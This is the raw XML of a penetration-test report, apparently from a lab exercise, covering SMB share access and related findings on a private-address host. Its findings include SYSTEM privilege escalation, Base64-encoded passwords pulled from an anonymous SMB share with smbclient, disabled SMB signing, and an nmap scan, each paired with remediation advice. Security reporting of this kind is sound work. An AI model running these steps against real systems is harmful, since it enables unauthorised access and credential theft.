wyogTGpPtdfpCR3khGEanc/nU1j7WNLzyWKB7e4NFqdIOACzxXS6mAPAgZiO&#10;Zpc9oHhhcj7Ez8JqkoKSerSSfWXHmxBRHdAnSCps7E4qlTdRGdKhhckFOAlnmMwaE4FQO6gLpqGE&#10;qQYjz6PPlMEqWaXPE1HwzX6jPDmyNCj5Sq2j3B+wVHvLQtvjcqpXqGXEqVBSlxSicA1fKwOSZGBv&#10;WYr2tnqE5972wxgc30nQ3rAQ75jH9KF/nM94i1utLETZIaKktf7Xv94nPIYCWUo6TDME/zwwLyhR&#10;XwzGZTGezUAb82I2v5hg4V9n9q8z5qA3Fj6M8SdwPIcJH9VTWHurf+AYr1NVpJjhqN1bOyw2sT9l&#10;+BFwsV5nGEbesXhjHhxP5P0Grg/R1jLv7Ys7g2kY+rwHwwFNp+r1OqNefkq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CnPwLZAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2Lnht&#10;bFBLAQIUABQAAAAIAIdO4kD1UnRHagIAANwEAAAOAAAAAAAAAAEAIAAAACgBAABkcnMvZTJvRG9j&#10;LnhtbFBLBQYAAAAABgAGAFkBAAAEBgAAAAA=&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEAEA20">
      <w:pPr>
        <w:pStyle w:val="2"/>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#This confirms if privilege escalation to SYSTEM has been performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A579DF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1944370"/>
            <wp:effectExtent l="0" t="0" r="825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8595" cy="1944370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48015AE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change of the prompt to system32 shows you are in the server as a system user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337592BE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342F1135">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Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCBD232">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Remove SeImpersonatePrivilege from non-administrative accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3701B2CC">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Apply the principle of least privilege for all service accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA36EEF">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Implement Application Whitelisting to prevent unauthorized tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B52F4">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Monitor for suspicious process execution using endpoint detection tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F817CD5">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Apply security patches for known impersonation vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE68F0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Finding 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF2AD9">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Title: Base64 Encoded credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC5FC3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Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDA3C7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Description: The nt4wrksv  SMB share contained a file named passwords.txt with user credentials encoded in Base64. Base64 is not a secure encryption method and can be trivially decoded by anyone with access to the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2D9B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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270E26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~Attackers with access to the SMB share can obtain valid user credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD4A8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~These credentials can be used for lateral movement or privileged access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13922D3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passwords were weak and predictable, making them vulnerable to brute-force attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AA424">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Proof of concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177F6B58">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smbclient //10.49.167.173/nt4wrksv -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C4D54C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Once the smb \&gt; prompt displays run the command below to see the files contained in the shared folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4052B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03582821">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1102D63E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E17138">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F6BB22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2517C4FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-58420</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>175260</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5229225" cy="285750"/>
                <wp:effectExtent l="6350" t="6350" r="22225" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="43" name="Rectangle 43"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1084580" y="8132445"/>
                          <a:ext cx="5229225" cy="285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pt;margin-top:13.8pt;height:22.5pt;width:411.75pt;z-index:251667456;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJARWHjFtgAAAAI&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PMU/DMBSEdyT+g/WQ2Fo7oU3bEKdDEAMCqaKwdHPjRxKI&#10;nyPbScq/x0wwnu50912xv5ieTeh8Z0lCshTAkGqrO2okvL89LrbAfFCkVW8JJXyjh315fVWoXNuZ&#10;XnE6hobFEvK5ktCGMOSc+7pFo/zSDkjR+7DOqBCla7h2ao7lpuepEBk3qqO40KoBqxbrr+NoJJzW&#10;n/zQVbMaX54enteTs6JaWSlvbxJxDyzgJfyF4Rc/okMZmc52JO1ZL2GxS2NSQrrJgEV/m6zugJ0l&#10;bNIMeFnw/wfKH1BLAwQUAAAACACHTuJAk4O9UmwCAADcBAAADgAAAGRycy9lMm9Eb2MueG1srVTL&#10;btswELwX6D8QvDeyFblxjMiBESNFgaAxmhY90xQlEeCrJP1Iv75DSknctIcc6gO95K5md4a7vLo+&#10;akX2wgdpTU2nZxNKhOG2kaar6fdvtx/mlITITMOUNaKmjyLQ6+X7d1cHtxCl7a1qhCcAMWFxcDXt&#10;Y3SLogi8F5qFM+uEgbO1XrOIre+KxrMD0LUqysnkY3GwvnHechECTteDk46I/i2Atm0lF2vLd1qY&#10;OKB6oVgEpdBLF+gyV9u2gsf7tg0iElVTMI15RRLY27QWyyu26DxzveRjCewtJbzipJk0SPoMtWaR&#10;kZ2Xf0Fpyb0Nto1n3OpiIJIVAYvp5JU2Dz1zInOB1ME9ix7+Hyz/st94IpuaVueUGKZx41+hGjOd&#10;EgRnEOjgwgJxD27jx12AmdgeW6/TP3iQI5ppMq9mc0j7WNP59LysqtkgsDhGwhEwK8vLspxRwhFR&#10;zmcXs3wDxQuS8yF+ElaTZNTUo5SsK9vfhYjsCH0KSYmNvZVK5UtUhhxQQnkxQQGcoTNbdARM7cAu&#10;mI4Spjq0PI8+QwarZJM+T0DBd9sb5cmepUbJv1Q60v0RlnKvWeiHuOwaGGoZMRVKajA//VoZgCQB&#10;B8mStbXNIzT3dmjG4PitBOwdC3HDPLoP9WM+4z2WVlmQsqNFSW/9r3+dp3g0BbyUHNDNIPxzx7yg&#10;RH02aJfLaVUBNuZNNbsosfGnnu2px+z0jYUOU7wEjmczxUf1ZLbe6h8Y41XKChczHLkHacfNTRym&#10;DA8BF6tVDkPLOxbvzIPjCXy4wNUu2lbmu31RZxQNTZ/vYBzQNFWn+xz18ig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YeMW2AAAAAgBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54&#10;bWxQSwECFAAUAAAACACHTuJAk4O9UmwCAADcBAAADgAAAAAAAAABACAAAAAnAQAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwUGAAAAAAYABgBZAQAABQYAAAAA&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="409C2A47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">#This downloads the file from the remote server folder to your local machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7307EE2E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D91EAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exit the smb prompt and read the contents of the file from your local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AAA569">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1908F1B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB4FDE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB6AFFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This displays the users and their passwords all encoded to base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E77A4B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD29607">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E4573A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="329565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66690" cy="3295650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A081476">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4752F161">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Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09827CF7">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Never store passwords in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plain text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or weak encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368745BE">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Use a secure password vault for credential storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4F43B">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Implement a password manager with encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12308EAE">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Enforce strong password policies for all users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7194C1">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Use Active Directory for centralized authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EB09A9">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Finding 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F902D7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Title: SMB Message Signing Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B6AF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Severity: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0995AD4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Description: The SMB service was configured with message signing disabled. Message signing is a security feature that adds a digital signature to each SMB packet to ensure its integrity and authenticity. When disabled, the service becomes vulnerable to man-in-the-middle attacks where an attacker can intercept, modify, or relay SMB traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69B16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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC5595">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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SMB relay attacks can capture and replay authentication credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA93D2E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Attackers can escalate privileges through NTLM relay attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C7ED6B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Increased risk of credential theft and unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1CB10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Proof of concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C4E202">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-133985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5486400" cy="2713990"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="44" name="Rectangle 44"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1056640" y="1553210"/>
                          <a:ext cx="5486400" cy="271399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5pt;margin-top:23.3pt;height:213.7pt;width:432pt;z-index:251668480;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAjUcuANkAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PsU7DMBCGdyTewTokttZOlIY2jdMhiAGBhFpY2Nz4SAKx&#10;HdlOUt6eY4Lx7j799/3l4WIGNqMPvbMSkrUAhrZxurethLfXh9UWWIjKajU4ixK+McChur4qVaHd&#10;Yo84n2LLKMSGQknoYhwLzkPToVFh7Ua0dPtw3qhIo2+59mqhcDPwVIicG9Vb+tCpEesOm6/TZCS8&#10;bz75S18vanp+vH/azN6JOnNS3t4kYg8s4iX+wfCrT+pQkdPZTVYHNkhYpUlCqIQsz4ERsM3SHbAz&#10;Le4yAbwq+f8K1Q9QSwMEFAAAAAgAh07iQOHcM/hnAgAA3QQAAA4AAABkcnMvZTJvRG9jLnhtbK1U&#10;TW8bIRS8V+p/QNybtR07H1bWkRUrVaWojZpWPWMWdpH4KmCv01/fgd0kbtpDDvUBP3iz83jDwNX1&#10;wWiyFyEqZ2s6PZlQIix3jbJtTb9/u/1wQUlMzDZMOytq+igivV69f3fV+6WYuc7pRgQCEhuXva9p&#10;l5JfVlXknTAsnjgvLJLSBcMSpqGtmsB6sBtdzSaTs6p3ofHBcREjVjdDko6M4S2ETkrFxcbxnRE2&#10;DaxBaJbQUuyUj3RVdiul4OmLlFEkomuKTlMZUQTxNo/V6oot28B8p/i4BfaWLbzqyTBlUfSZasMS&#10;I7ug/qIyigcXnUwn3JlqaKQogi6mk1faPHTMi9ILpI7+WfT4/2j55/19IKqp6XxOiWUGJ/4VqjHb&#10;akGwBoF6H5fAPfj7MM4iwtztQQaT/9EHOcBMk8XZ2RzSPiJeLE5n01FgcUiEA7CYXyAPAAdidj49&#10;vbwsiOqFyoeYPgpnSA5qGrCXIizb38WE8oA+QXJl626V1uUUtSU96s7OSwEGa0pYArWMR3vRtpQw&#10;3cLzPIVCGZ1WTf48E8XQbm90IHuWnVJ+uXeU+wOWa29Y7AZcSQ0eMirhWmhlanpx/LW2IMkKDprl&#10;aOuaR4ge3ODG6PmtAu0di+meBdgPAuGCpi8YpHZoyo0RJZ0Lv/61nvFwBbKU9LAzGv65Y0FQoj9Z&#10;+OVyOs8Hk8pkvjifYRKOM9vjjN2ZGwcdpngKPC9hxif9FMrgzA/c43WuihSzHLUHacfJTRquGV4C&#10;LtbrAoPnPUt39sHzTD4c4HqXnFTlbF/UGUWD68sZjDc0X6vjeUG9vEq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1HLgDZAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBL&#10;AQIUABQAAAAIAIdO4kDh3DP4ZwIAAN0EAAAOAAAAAAAAAAEAIAAAACgBAABkcnMvZTJvRG9jLnht&#10;bFBLBQYAAAAABgAGAFkBAAABBgAAAAA=&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo nmap -sV -sC -Pn -vv 10.49.167.173</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637A23A5">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#sudo runs Nmap with administrative privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC7994">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#Nmap is network mapper which is a scanning tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D8927">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#-sV version detection that finds out the software versions running in each open port.</w:t>
      </w:r>
    </w:p>
